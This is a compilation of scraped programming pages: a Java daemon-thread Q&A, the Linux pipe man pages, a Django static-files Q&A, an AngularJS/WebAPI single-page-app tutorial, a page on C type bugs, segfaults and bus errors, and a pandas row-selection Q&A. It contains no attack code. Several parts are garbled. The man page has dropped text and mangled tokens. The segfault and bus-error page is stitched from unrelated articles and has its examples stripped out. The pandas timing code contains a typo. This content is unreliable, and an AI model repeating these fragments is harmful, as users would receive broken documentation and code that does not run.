8140/what-are-daemon-threads-in-java A daemon thread is a thread that is doing some tasks in the background like handling requests or various chronjobs that can exist in an application. When your program which only has daemon threads remaining, will exit. This is because usually these threads work together with normal threads and provide background handling of events. You can specify that a Thread is a daemon one by using a setDaemon method, they usually don't exit, neither they are interrupted.. they just stop when an application stops. Using three dots: public void move(Object... x) { ...READ MORE According to Effective Java, chapter 4, page 73, ...READ MORE equals() must define an equivalent relation and ...READ MORE The different ways of comparing string in ...READ MORE We can find a big difference between ...READ MORE Runnable is the preferred way to create ...READ MORE Yes, in Java we do have a ...READ MORE public class Test { // ...READ MORE There are different ways you could do this ...READ MORE You can use this method: String[] strs = ...READ MORE OR At least 1 upper-case and 1 lower-case letter Minimum 8 characters and Maximum 50 characters Already have an account? Sign in.
https://www.edureka.co/community/8140/what-are-daemon-threads-in-java
CC-MAIN-2022-21
en
refinedweb
Section (2) pipe Name pipe, pipe2 — create pipe Synopsis #include <unistd.h> /* On Alpha, IA-64, MIPS, SuperH, and SPARC/SPARC64; see NOTES */ struct fd_pair { long fd[2]; }; /* On all other architectures */ #define _GNU_SOURCE /* See feature_test_macros(7) */ #include <fcntl.h> /* Obtain O_* constant definitions */ #include <unistd_CLOEXEC Set the close-on-exec ( FD_CLOEXEC) flag on the two new file descriptors. See the description of the same flag in open(2) for reasons why this may be useful. O_DIRECT(since Linux 3.4) Create a pipe that performs I/O in packet mode. Each write(2) to the pipe is dealt with as a separate packet, and read(2)s from the pipe will read one packet at a time. Note the following points: Writes of greater than PIPE_BUFbytes (see pipe(7)) will be split into multiple packets. The constant PIPE_BUFis defined in limits.h If a read(2) specifies a buffer size that is smaller than the next packet, then the requested number of bytes are read, and the excess bytes in the packet are discarded. Specifying a buffer size of PIPE_BUFwillsetting of a pipe file descriptor using fcntl(2). O_NONBLOCK Set the O_NONBLOCKfile status flag on the open file descriptions referred to by the new file descriptors. Using this flag saves extra calls to fcntl(2) to achieve the same result. RETURN VALUE On success, zero is returned. On error, −1 is returned, errno is set appropriately, and pipefd is left unchanged. On Linux (and other systems), pipe() does not modify pipefd on failure. A requirement standardizing this behavior was added in POSIX.1-2016. The Linux-specific pipe2() system call likewise does not modify pipefd on failure. ERRORS - EFAULT pipefdis). VERSIONS pipe2() was added to Linux in version 2.6.27; glibc support is available starting with version 2.9. NOTES The SystemV_zsingle_quotesz_t take any arguments and returns a pair of file descriptors as the return value on success. The glibc pipe() wrapper function transparently deals with this. See syscall(2) for information regarding registers used for storing second file descriptor. EXAMPLE The following program creates a pipe, and then fork(2)s to create a child process; the child inherits a duplicate set of file descriptors that refer to the same pipe. After the fork(2), each process closes the file descriptors that it doesn_zsingle_quotesz_t need for the pipe (see pipe(7)). The parent then writes the string contained in the program_zsingle_quotesz_s command-line argument to the pipe, and the child reads this string a byte at a time from the pipe and echoes it on standard output. Program source > , argv[0]); exit(EXIT_FAILURE); } if (pipe(pipefd) == −1) { perror(pipe); exit(EXIT_FAILURE); } cpid = fork(); if (cpid == −1) { perror(fork); exit(EXIT_FAILURE); } if (cpid == 0) { /* Child reads from pipe */ close(pipefd[1]); /* Close unused write end */ while (read(pipefd[0], &buf, 1) > 0) write(STDOUT_FILENO, &buf, 1); write(STDOUT_FILENO, ,), splice(2), tee(2), vmsplice(2), write(2), popen(3), pipe(7) Section (7) pipe Name pipe — overview of pipes and FIFOs DESCRIPTION PipesOs On Linux, the following files control how much memory can be used for pipes: /proc/sys/fs/pipe-max-pages (only in Linux 2.6.34) An upper limit, in pages, on the capacity that an unprivileged user (one without the CAP_SYS_RESOURCEcapability)capability., attempts to create new pipes will be denied, and attempts to increase a pipe_zsingle_quotesz, individual pipes created by a user will be limited to one page, and attempts to increase a pipe_zsingle_quotesz POSbytes are written atomically; write(2) may block if there is not room for nbytes to be written immediately O_NONBLOCKenabled, n<= PIPE_BUF If there is room to write nbytes to the pipe, then write(2) succeeds immediately, writing all nbytes; otherwise write(2) fails, with errnoset to EAGAIN. O_NONBLOCKdisabled, n> PIPE_BUF The write is nonatomic: the data given to write(2) may be interleaved with write(2)s by other process; the write(2) blocks until nbytes have been written. O_NONBLOCKenabled, n> PIPE_BUF If the pipe is full, then write(2) fails, with errnoset to EAGAIN. Otherwise, from 1 to nbytes may be written (i.e., a partial write may occur; the caller should check the return value from write(2) to see how many bytes were actually written), and these bytes may be interleaved with writes by other processes. Open file status flags On some systems (but not Linux), pipes are bidirectional: data can be transmitted in both directions between the pipe ends. POSIX.1 requires only unidirectional pipes. Portable applications should avoid reliance on bidirectional pipe semantics. BUGS Before Linux 4.9, some bugs affected the handling of the pipe-user-pages-soft and pipe-user-pages-hard limits when using the fcntl(2) F_SETPIPE_SZ operation to change a pipe_zsingle_quotesz_zsingle_quotesz_s capacity; an unprivileged user can always decrease a pipe_zsingle_quotesz_zsingle_quotesz. SEE ALSO mkfifo(1), dup(2), fcntl(2), open(2), pipe(2), poll(2), select(2), socketpair(2), splice(2), stat(2), tee(2), vmsplice(2), mkfifo(3), epoll(7), fifo(7)
https://manpages.net/detail.php?name=pipe
CC-MAIN-2022-21
en
refinedweb
Each Answer to this Q is separated by one/two green lines. I’m trying to deploy my Django application to the web, but I get the following error: You’re using the staticfiles app without having set the STATIC_ROOT setting to a filesystem path However, I did in my production.py: from django.conf import settings DEBUG = False TEMPLATE_DEBUG = True DATABASES = settings.DATABASES STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static') # Update database configuration with $DATABASE_URL. import dj_database_url db_from_env = dj_database_url.config(conn_max_age=500) DATABASES['default'].update(db_from_env) # Static files (CSS, JavaScript, Images) # PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__)) STATIC_URL = '/static/' # Extra places for collectstatic to find static files. STATICFILES_DIRS = ( os.path.join(PROJECT_ROOT, 'static'), ) # Simplified static file serving. # STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage' What is the production.py file? How do you import your settings? Depending on how you got this error (serving django through a wsgi server or on the command line), check for manage.py or wsgi.py to see what is the name of the default settings file. If you want to manuallly set the settings to use, use something like this: ./manage.py --settings=production Where production is any python module. Moreover, your settings file should not import anything django related. If you want to split your settings for different environments, use something like this. A file settings/base.py # All settings common to all environments PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__)) STATIC_URL = '/static/' STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static') Files like settings/local.py, settings/production.py… # Production settings from settings.base import * DEBUG = False DATABASES = … If you are using Django 2.2 or greater, your settings file already has a line similar to this: # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) Therefore you can easily set static like so: STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_DIR, 'static') Django settings for static assets can be a bit difficult to configure and debug. However, if you just add the following settings to your settings.py, everything should work exactly as expected: goto “settings.py” add following code BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Static files (CSS, JavaScript, Images) # STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles') STATIC_URL = '/static/' # Extra places for collectstatic to find static files. STATICFILES_DIRS = ( os.path.join(BASE_DIR, 'static'), ) See a full version of our example settings.py on GitHub. now create static folder in root directory, and a random file inside. for more refer:
https://techstalking.com/programming/python/python-django-youre-using-the-staticfiles-app-without-having-set-the-static_root-setting/
CC-MAIN-2022-40
en
refinedweb
SPA which stands for Single Page Application is the latest trend in web application development.It is a web application that load a single HTML page initially and is dynamically updated as the user interacts with the application. In this article we will see the requirement for SPAs and explore the technologies we can use to create a Single Page Application.We will also see how to create a basic application using AngularJS ,WebAPI and Entity Framework. The goal of a SPA is to provide the experience to the user which is like a desktop application. SPA provides rich User experience by reducing round trips to the server.This is achieved by moving as much logic as possible to the client. In a Single Page Application or SPA the page never reloads though parts of the page may refresh. This reduces the round trips to the server to a minimum. If we consider any web application there are two main components involved web server and web browser or the client. width="624" height="470" alt="Image 2" data-src="/KB/aspnet/737030/3.png" class="lazyload" data-sizes="auto" data-> As is clear from the diagram the client side has lot more responsibilities in the case of SPAs than in a traditional web application. Implementing all these additional responsibilities using JavaScript and HTML alone can increase the complexity and is also not an easy task to achieve and to maintain such a complex application. Jquery drastically reduces the complexity in manipulating the DOM but still we need to understand the DOM architecture to manipulate it. Also testing code written using Javascript or Jquery can be a big challenge. So building SPAs from a scratch can be real nightmare.This is where Javascript Presentation Frameworks are useful.There are Javascript open source frameworks available to create SPAs. Two of the most common ones are DurandalJS and AngularJS. Most SPA applications are structured as: width="620" height="400" alt="Image 3" data-src="/KB/aspnet/737030/4.png" class="lazyload" data-sizes="auto" data-> Model is the single source of data for the application. Controller ties views and model together. Using the code In this application we would be using the following frameworks and technologies Client Angularjs an open-source JavaScript framework by Google. It helps to structure browser-based applications using model,view and controller. Server WebAPI is a framework to build HTTP services and suitable for building RESTful services. Entity Framework and SQL Server Entity Framework is an object-relational mapper that enables .NET developers to work with relational data using domain-specific objects. SQL server is the relational database most commonly used in .NET applications. Here we would be using Angular to build a simple application that provides CRUD functionality so we would be looking into the main features of Angular. Angular is a complete SPA framework so it includes lot of different features not just about about Angular provides lots of features as a presentation framework some of which are: So lets get started building our first basic SPA using AngularJS. We will be discussing the features of AngularJS along the way .The first thing we need to do use AngularJS is to include the AngularJS library as <script src="~/Scripts/js/angular.min.js"></script> Now we are ready to use the AngularJS features in our application. Now we will create a module that will define the scope for the application and a controller that coordinates with the view and model. Though we are creating single module but a real world application can consist of multiple modules. Following is the module and the method to call the service get method.There are methods for other CRUD operations which are similar to the below get method. var customersApp= angular.module('customersApp', ['ngGrid']); customersApp.controller('customerCtrl', function ($scope,userRepository) { }) You might be wondering what the userRepository is.For that first we need to understand the concept of Services and Factories These are used to generate an object or function that represents the service which can be consumed by the rest of the application. This object or function is then passed as a parameter to any other function which wants to use this service or factory.This is possible because of DI provided by angualrJS automatically. When declaring serviceName as an injectable argument you will be provided with an instance of the function. In other words new Function(). So when using service as an argument a new instance of the service function is created. When using factory as an argument the value of the argument is a value which is returned by invoking the function passed to factory method .Below illustration will make it more clear. app.factory('MyFactory', function(){ return { testfunction: function(text){ return "Hello"+text; } } }); Here if we use MyFactory as a function argument then the value of that argument is the value returned by the function which is testfunction.Here we will be using the factory to fetch the data from the WebAPI. customersApp.factory('customerRepository', function ($http) { return { getCustomers: function (callback) { $http.get(url).success(callback); } The $http service is an inbuilt Angular service that is used for communication with the remote HTTP servers.One of the most important services to understand is the $scope service.It acts as the glue between the controller and the view or the html template. style="font-size: 14px; cursor: pointer; border: 0; width: 700px; height: auto" alt="Image 4" data-src="/KB/aspnet/737030/5-r-700.png" class="lazyload" onclick="imageCleanup.showFullImage('/KB/aspnet/737030/5.png')" data-sizes="auto" data-> Controller is not aware what views are there in the application.It just knows about the scope ,which it sets and which is accessible from the view.If you have worked in MVVM or similar presentation pattern then it is similar to a viewmodel. Now lets go ahead and create our controller. customersApp.controller('customerCtrl', function ($scope, customerRepository) { getCustomers(); function getCustomers() { customerRepository.getCustomers(function (results) { $scope.customerData = results; }) } The get method fetches data from the WebAPI. The other methods for the CRUD operations are similar. Now that we have the script ready we can create the view template. Direcives are a way to extend the html.We can make custom HTML elements or extend the existing ones.So we can wrap the functionality that we want to provide in a directive.We can provide additional functionality without using directives also using Jquery so you think the advantage of directives.But the below example would make obvious the advantage of directives. Using Jquery first we have to write <input id="dateOfBirth"> and then call $('#dateOfBirth').datepicker() Contrast this how we use could use the if datepicker is a directive <input datepicker> So using directive is not only more convenient but also makes them part of our html.Directives can be either elements or attributes ngBind The ngBind attribute tells Angular to replace the text content of the specified HTML element with the value of a given expression.We use the curly braces markup {{ }} or data binding expression usually which provides the same functionality. ngModel binds the input element to a property on the scope set by the Controller ng-app sets the scope for the angularjs application and can be placed on any element though typically placed on the root element.ng-app initializes angularjs app ,so this is a required directive in any application using angularjs ng-controller attaches a controller to the view The first directive we need to add to the page is <html ng- Above directive will instantiate the angularJS application.We will now specify the controller to use using the ng-controller directive .We will use the controller we had defined. <body ng- So the only thing we need to do in view is to use the $scope to access the data.As you might have felt this creates a decoupled architecture as the view and controller do not need to know about each other. Now we can use the data binding expressions in our views to display the data. Data binding expression use the following form {{ name }} where name is the name of the variable we have added to the $scope. Now that we have created the html template we can move to the WebAPI part to store and retrieve the data. WebAPI is a framework for building HTTP services that cab be consumed by different types of clients such as browsers and mobile devices.It's an ideal platform to build RESTful services.We will be using WebAPI to perform CRUD operations on the database.Its quite simpleto perform CRUD operations using WebAPI.It provides methods that maps to standard HTTP verbs GET,POST ,PUT,DELETE. These methods are used to perform database operations and handle the client requests. First we will create the Customer entity which we need to perform the actions on using the WebAPI methods. public class Customer { public string id { get; set; } public string city { get; set; } public string name { get; set; } public string address { get; set; } public string contactNo { get; set; } public string emailId { get; set; } } public class CustomerContext : DbContext { public DbSet<Customer> Customers { get; set; } } Next we add the WebAPI controller class. width="454" height="270" alt="Image 5" data-src="/KB/aspnet/737030/api1.png" class="lazyload" data-sizes="auto" data-> In the model option we will select our Customer class and we will have the actions generated for us.As we are using the Entity Framework so the data access code is handled by the Entity framework for us.Following are the CRUD operations using the Entity Framework. public class CustomerController : ApiController { // GET api/<controller> public IEnumerable<Customer> Get() { CustomerContext customersdb = new CustomerContext(); return customersdb.Customers; } public void Post([FromBody]Customer customer) { CustomerContext customersdb = new CustomerContext(); customersdb.Customers.Add(customer); customersdb.SaveChanges(); } // PUT api/<controller>/5 public void Put(int id, [FromBody]Customer customer) { CustomerContext customersdb = new CustomerContext(); Customer customerToRemove=customersdb.Customers.Find(customer.id); customersdb.Customers.Remove(customerToRemove); Customer updatedCustomer = customer; customersdb.Customers.Add(updatedCustomer); customersdb.SaveChanges(); } // DELETE api/<controller>/5 public void Delete(string id) { CustomerContext customersdb = new CustomerContext(); Customer cust=customersdb.Customers.Find(id); customersdb.Customers.Remove(cust); customersdb.SaveChanges(); } } As we are using the code first approach so we will have the database structure created for us when we run the application. We can insert a new customer as well as edit and delete the customers using the application. alt="Image 6" data-src="/KB/aspnet/737030/crud11-r-700.png" class="lazyload" style="cursor: pointer; border: 0; width: 700px; height: auto" onclick="imageCleanup.showFullImage('/KB/aspnet/737030/crud11.png')" data-sizes="auto" data-> So this was a basic introduction to the Single Page Applications.We saw how to create a CRUD application using AngularJS and WebAPI. Javascript frameworks like AngularJS can help us getting started creating a SPA application rapidly. This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) So lets get started building our first basic SPA using AngularJS. We will be discussing the features of AngularJS along the way .The first thing we need to do use AngularJS is to include the AngularJS library as BundleTransformer.Core Defaultconnection \aspnet-MvcApplication4-20140301124938.mdf General News Suggestion Question Bug Answer Joke Praise Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
https://codeproject.freetls.fastly.net/Articles/737030/A-basic-SPA-application-using-AngularJS-WebAPI-and?msg=4776414#xx4776414xx
CC-MAIN-2022-40
en
refinedweb
GNU Image Manipulation Program version 2.10.8 git-describe: GIMP_2_10_6-294-ga967e8d2c2 C compiler: FreeBSD clang version 6.0.0. For example, elements 0 to 0x1000 are inaccessible. When you try to access an inaccessible element, you generate a segmentation violation, and your program. Bus Error is caused due to alignment issues with the CPU (e.g., trying to read a long from an address which isn't a multiple of 4). Confirm. was: Bus error core dumped c programming Bus error core dumped c programming - are not C Types, Casting, Segementation Violations and Bus Errors Three Common Type BugsThe first one looks idiotic, but it is at the heart of all type bugs. Look at : main() { char c; int i; int j; i = 10000; c = i; j = c; printf("I: %d, J: %d, C: %d\n", i, j, c); printf("I: 0x%04x, J: 0x%04x, C: 0x%04x\n", i, j, c); } Since c is a char, it cannot hold the value 10000. It will instead hold the lowest order byte of i, which is 16 (0x10). Then when you set j to c, you'll see that j becomes 16. Make sure you understand this bug. The second bug is a typical one when you deal with math routines. If you say ``man log10,'' you'll see that it takes a double and returns a double:double log10(double x); So tries to take the log of 100.0, which should be two: main() { double x; x = log10(100); printf("%lf\n", x); } When you compile it, you have to include -lm on the linking line so that it includes the math libraries. When you do this, you'll see a weird result: UNIX> pd -1035.000000 Why? This is because you didn't include math.h in your C program, and therefore the compiler assumed that you were passing log10 an integer, and that it returned an integer. And the compiler doesn't worry about casting int's to double's. So you get the bug. You can fix this by including math.h, as in : #include < math.h > main() { double x; x = log10(100); printf("%lf\n", x); } UNIX> pd 2.00000 Finally displays another common type bug: main() { double x; int y; int z; x = 4000.0; y = 20; z = -17; printf("%d %d %d\n", x, y, z); printf("%f %d %d\n", x, y, z); printf("%lf %d %d\n", x, y, z); printf("%lf %lf %lf\n", x, y, z); } UNIX> pf 1085227008 0 20 4000.000000 20 -17 4000.000000 20 -17 4000.000000 0.000000 -3566985184068214263610043868633531298423160069569428047775 20030203482592393258067630813913494098481449525958709939145371702732604277129148 77019863534390180062158966919576508126277491063615751217181296481290794579216716 39726032966871746925158515232719273883094320046823318866372976525388441556587623 1667712.000000 Typically you see the first bug in line one. You try to print out a double as an int. Not only does it get the value wrong, but it gets x and y wrong as well. You'll learn why later. Lines two and three are fine, but line 4 is now wrong, because you try to print all three quantities as double's. Again, you'll see the reason why later, but you should be aware of this kind of bug now, since you may well see it again. Core Dump (Segmentation fault) in. Common segmentation fault scenarios: - Modifying a string literal : The below program may crash (gives segmentation fault error) because the line *(str+1) = ‘n’ tries to write a read only memory. C++ C Abnormal termination of program: C++ C Output: - Accessing out of array index bounds : CPP C Output: - Segmentation fault. C++ C Output: -. C++14 C This article is contributed by Bishal Kumar Dubey. If you like GeeksforGeeks and would like to contribute, you can also write an article using write.geeksforgeeks.org or mail your article to [email protected] See your article appearing on the GeeksforGeeks main page and help other Geeks. Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above. UNIX for Advanced & Expert Users 10 More Discussions You Might Find Interesting 1. Programming C: Memory Fault (core dumped) When I run programm show this message: Memory Fault (core dumped) Does anyone can help me and tell me what is wrong? please #include <stdlib.h> #include <stdio.h> #include <process.h> #include <unistd.h> #include <sys/types.h> #include <sys/wait.h> int main(int argc, char *argv) { ... (3 Replies) Discussion started by: ebasse2 3 Replies 3. Filesystems, Disks and Memory (core dumped) gjar hello, when i make gcc 4.4.2 i get this message find gnu java javax org sun -name .svn -prune -o -name '*.class' -print What is a bus error? Is it different from a segmentation fault? minimal POSIX 7 example "Bus error" happens when the kernel sends to a process. A minimal example that produces it because was forgotten: Run with: Tested in Ubuntu 14.04. POSIX describes as: Access to an undefined portion of a memory object. The mmap spec says that: References within the address range starting at pa and continuing for len bytes to whole pages following the end of an object shall result in delivery of a SIGBUS signal. And says that it generates objects of size 0: The shared memory object has a size of zero. So at we are touching past the end of the allocated object. Unaligned stack memory accesses in ARMv8 aarch64 This was mentioned at: What is a bus error? for SPARC, but here I will provide a more reproducible example. All you need is a freestanding aarch64 program: That program then raises SIGBUS on Ubuntu 18.04 aarch64, Linux kernel 4.15.0 in a ThunderX2 server machine. Unfortunately, I can't reproduce it on QEMU v4.0.0 user mode, I'm not sure why. The fault appears to be optional and controlled by the and fields, I have summarized the related docs a bit further here. Program crash messages tl;dr: - segfault means the kernel says: there is something at that address, but your process may not access it - bus error means the kernel says: that address doesn't even exist - anymore, or at all - pointer bugs can lead to either segfault or bus error - ...note that specific bugs are biased to cause one or the other, due to the likeliness of hitting existing versus non-existing addresses - (and various things can influence that likeliness, e.g. 32-bit address spaced usually being mostly or fully mapped, 64-bit not) - abort() means code itself says "okay, continuing running is a Bad Idea, let's stop now" - usually based on a test that should never fail. - if you look from a distance it's much like an exit(). The largest practical differences: - abort implies dumping core, so that you can debug this - abort avoids calling exit handlers - ...and the earlier this happens, the more meaningful debugging of the dumped core is. Hence the explicit test and abort. - a fairly common case is memory allocation (as signalled by something that actually checks; not doing so is often a segfault very soon after, particularly if dereferencing null) Segfault Segmentation refers to the fact that processes are segmented from each other. A segmentation fault (segfault) signals that the requested memory location exists, but the process is not allowed to do what it is trying. Which is often one of: - the address isn't of the requesting processess's currently mapped space, e.g. - a the null pointer dereference, because most OSes don't map the very start of memory to any process (mostly for this special case) - buffer overflow when it gets to memory outside the mapped space - a stack overflow can cause it (though other errors may be more likely, because depending on setup it may trample all of the heap before it does) - attempt to write to read-only memory A segfault is raised by hardware that supports memory protection (the MPU in most modern computers), which is caught by the kernel. The kernel then decides what to do, which in linux amounts to sending a signal (SIGSEGV) to the originating process, where the default signal handler quits that program. Bus error Means the processor / memory subsystem cannot even attempt to access the memory it was asked to access. Also sent by hardware, received by the kernel, and on linux handled by sending it SIGBUS, triggering the default signal handler. Possible causes include: - address does not make sense, in that it cannot possibly be there (outside of mappable addresses) - e.g. a using random number as a pointer pointer has a decent chance of being this or a segfault - IO - device became unavailable (verify) - device has to reports something is unavailable, e.g. a RAID controller refusing access to a broken drive (e.g. search for combination with "rejecting I/O to offline device") - ...or ran out of space, e.g. when mmapping on a ram disk (verify) - address fails the platform's alignment requirements - larger-than-byte units often have to be aligned to their size, e.g. 16-bit to the nearest 16-bit address - Less likely on x86 style platforms than others (x86 is more lenient around misalignments than others) - Theoretically rare anyway, as compilers tend to pad data that is not ideally aligned. - cannot page in the backing memory (verify) - e.g. - a broken swap device? (verify) - accessing a memory-mapped file that was removed - executing a binary image that was removed (similar note as above) In comparison to a segfault: - similar in that it is about the address - and having a mangled or random-valued pointer value could lead to either - similar in that both are raised by the underlying hardware, that the OS sends the originating process a signal, and that the default (kernel-supplied) signal handler kills that originating process. - differs in that a segfault means the request is valid in a mechanical way, but the requesting process may not do this operation Aborted (core dumped) This message comes from the default signal handler(verify) for an incoming SIGABRT. The reason for the handler is often to abort() and stop the process as soon as possible (without calling exit handlers(verify)), typically the process itself intentionally stopping/crashing as soon as possible, which is done for two good reasons: - the sooner you do, the more meaningful the core dump is to figuring out what went wrong - the sooner you do, the less likely you go on to nonsense things to data (and potentially write corrupted data to persistent storage) Ideally, this is only seen during debugging, but the latter reason is why you'ld leave this in.The likeliest sources are the process itself asking for this via a failed , from your own code or runtime checking from libraries, e.g. glibc noticing double free()s, malloc() noticing overflow corruption, etc. On core dumps A process core dump contains (most/all?(verify)) writeable segments specific to the process, which basically means the data segment and stack segment. A core dump uses ELF format, though is seems to be a bit of a de facto thing wider than the ELF standard. By default it does not contain the text segment, which contains the code, which is when debugging you also have to tell it what executable was being used. It wouldn't be executable even them, since it's missing some details (entry point, CPU state). Illegal instruction means the CPU got an instruction it did not support. It can happen when executable code becoming corrupted. More commonly, though it comes from programs being compiled with very specific optimizations within the wider platform it is part of. Most programs are compiled to avoid this ever happening, by being conservative about what it's being run on, which is what compilers and code defaults to. But when you e.g. compile for instructions that were recently introduced, and omit fallbacks (e.g. via intrinsics), and run it on an older CPU, you'll get this. For example, some recent tensorflow builds just assume your CPU has AVX instructions, which didn't exist in any CPUs from before 2011[2] and still don't in some lower-end x86 CPUs (Pentium, Celeron, Atom).
https://sprers.eu/bus-error-core-dumped-c-programming.php
CC-MAIN-2022-40
en
refinedweb
Sample problem: How can I select rows from a DataFrame based on values in some column in Pandas? In SQL, I would use: SELECT * FROM table WHERE colume_name = some_value I tried to look at Pandas’ documentation, but I did not immediately find the answer. How to select rows from a DataFrame based on column values? Answer which results in a Truth value of a Series is an ambiguous error. Answer #2: There are several ways to select rows from a Pandas dataframe: - Boolean indexing ( df[df['col'] == value] ) - Positional indexing ( df.iloc[...]) - Label index: import pandas as pd, numpy as np df = pd.DataFrame({'A': 'foo bar foo bar foo bar foo foo'.split(), 'B': 'one one two three two two one three'.split(), 'C': np.arange(8), 'D': np.arange(8) * 2}). mask = df['A'] == 'foo' We can then use this mask to slice or index the data frame df[mask] A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14. mask = df['A'] == 'foo' pos = np.flatnonzero(mask) df.iloc[pos] A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14 3. Label indexing Label indexing can be very handy, but in this case, we are again doing more work for no benefit df.set_index('A', append=True, drop=False).xs('foo', level=1) A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14 4. df.query() API pd.DataFrame.query is a very elegant/intuitive way to perform this task, but is often slower. However, if you pay attention to the timings below, for large data, the query is very efficient. More so than the standard approach and of similar magnitude as my best suggestion. df.query('A == "foo"') A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14 My preference is to use the Boolean mask Actual improvements can be made by modifying how we create our Boolean mask. mask alternative 1 Use the underlying NumPy array and forgo the overhead of creating another pd.Series mask = df['A'].values == 'foo' I’ll show more complete time tests at the end, but just take a look at the performance gains we get using the sample data frame. First, we look at the difference in creating the mask %timeit mask = df['A'].values == 'foo' %timeit mask = df['A'] == 'foo' 5.84 µs ± 195 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each) 166 µs ± 4.45 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each) Evaluating the mask with the NumPy array is ~ 30 times faster. This is partly due to NumPy evaluation often being faster. It is also partly due to the lack of overhead necessary to build an index and a corresponding pd.Series object. Next, we’ll look at the timing for slicing with one mask versus the other. mask = df['A'].values == 'foo' %timeit df[mask] mask = df['A'] == 'foo' %timeit df[mask] 219 µs ± 12.3 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) 239 µs ± 7.03 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) The performance gains aren’t as pronounced. We’ll see if this holds up over more robust testing. mask alternative 2 We could have reconstructed the data frame as well. There is a big caveat when reconstructing a dataframe—you must take care of the dtypes when doing so! Instead of df[mask] we will do this pd.DataFrame(df.values[mask], df.index[mask], df.columns).astype(df.dtypes) If the data frame is of mixed type, which our example is, then when we get df.values the resulting array is of dtype object and consequently, all columns of the new data frame will be of dtype object. Thus requiring the astype(df.dtypes) and killing any potential performance gains. %timeit df[m] %timeit pd.DataFrame(df.values[mask], df.index[mask], df.columns).astype(df.dtypes) 216 µs ± 10.4 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) 1.43 ms ± 39.6 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) However, if the data frame is not of mixed type, this is a very useful way to do it. Given np.random.seed([3,1415]) d1 = pd.DataFrame(np.random.randint(10, size=(10, 5)), columns=list('ABCDE')) d1 A B C D E 0 0 2 7 3 8 1 7 0 6 8 6 2 0 2 0 4 9 3 7 3 2 4 3 4 3 6 7 7 4 5 5 3 7 5 9 6 8 7 6 4 7 7 6 2 6 6 5 8 2 8 7 5 8 9 4 7 6 1 5 %%timeit mask = d1['A'].values == 7 d1[mask] 179 µs ± 8.73 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each) Versus %%timeit mask = d1['A'].values == 7 pd.DataFrame(d1.values[mask], d1.index[mask], d1.columns) 87 µs ± 5.12 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each) We cut the time in half. mask alternative 3 @unutbu also shows us how to use pd.Series.isin to. mask = df['A'].isin(['foo']) df[mask] A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14 However, as before, we can utilize NumPy to improve performance while sacrificing virtually nothing. We’ll use np.in1d mask = np.in1d(df['A'].values, ['foo']) df[mask] A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14. res.div(res.min()) 10 30 100 300 1000 3000 10000 30000 mask_standard 2.156872 1.850663 2.034149 2.166312 2.164541 3.090372 2.981326 3.131151 mask_standard_loc 1.879035 1.782366 1.988823 2.338112 2.361391 3.036131 2.998112 2.990103 mask_with_values 1.010166 1.000000 1.005113 1.026363 1.028698 1.293741 1.007824 1.016919 mask_with_values_loc 1.196843 1.300228 1.000000 1.000000 1.038989 1.219233 1.037020 1.000000 query 4.997304 4.765554 5.934096 4.500559 2.997924 2.397013 1.680447 1.398190 xs_label 4.124597 4.272363 5.596152 4.295331 4.676591 5.710680 6.032809 8.950255 mask_with_isin 1.674055 1.679935 1.847972 1.724183 1.345111 1.405231 1.253554 1.264760 mask_with_in1d 1.000000 1.083807 1.220493 1.101929 1.000000 1.000000 1.000000 1.144175 You’ll notice that the fastest times seem to be shared between mask_with_values and mask_with_in1d. res.T.plot(loglog=True) Functions def mask_standard(df): mask = df['A'] == 'foo' return df[mask] def mask_standard_loc(df): mask = df['A'] == 'foo' return df.loc[mask] def mask_with_values(df): mask = df['A'].values == 'foo' return df[mask] def mask_with_values_loc(df): mask = df['A'].values == 'foo' return df.loc[mask] def query(df): return df.query('A == "foo"') def xs_label(df): return df.set_index('A', append=True, drop=False).xs('foo', level=-1) def mask_with_isin(df): mask = df['A'].isin(['foo']) return df[mask] def mask_with_in1d(df): mask = np.in1d(df['A'].values, ['foo']) return df[mask] Testing res = pd.DataFrame( index=[ 'mask_standard', 'mask_standard_loc', 'mask_with_values', 'mask_with_values_loc', 'query', 'xs_label', 'mask_with_isin', 'mask_with_in1d' ], columns=[10, 30, 100, 300, 1000, 3000, 10000, 30000], dtype=float ) for j in res.columns: d = pd.concat([df] * j, ignore_index=True) for i in res.index:a stmt = '{}(d)'.format(i) setp = 'from __main__ import d, {}'.format(i) res.at[i, j] = timeit(stmt, setp, number=50) Special Timing Looking at the special case when we have a single non-object dtype for the entire data frame. Code Below spec.div(spec.min()) 10 30 100 300 1000 3000 10000 30000 mask_with_values 1.009030 1.000000 1.194276 1.000000 1.236892 1.095343 1.000000 1.000000 mask_with_in1d 1.104638 1.094524 1.156930 1.072094 1.000000 1.000000 1.040043 1.027100 reconstruct 1.000000 1.142838 1.000000 1.355440 1.650270 2.222181 2.294913 3.406735 Turns out, reconstruction isn’t worth it past a few hundred rows. spec.T.plot(loglog=True) Functions 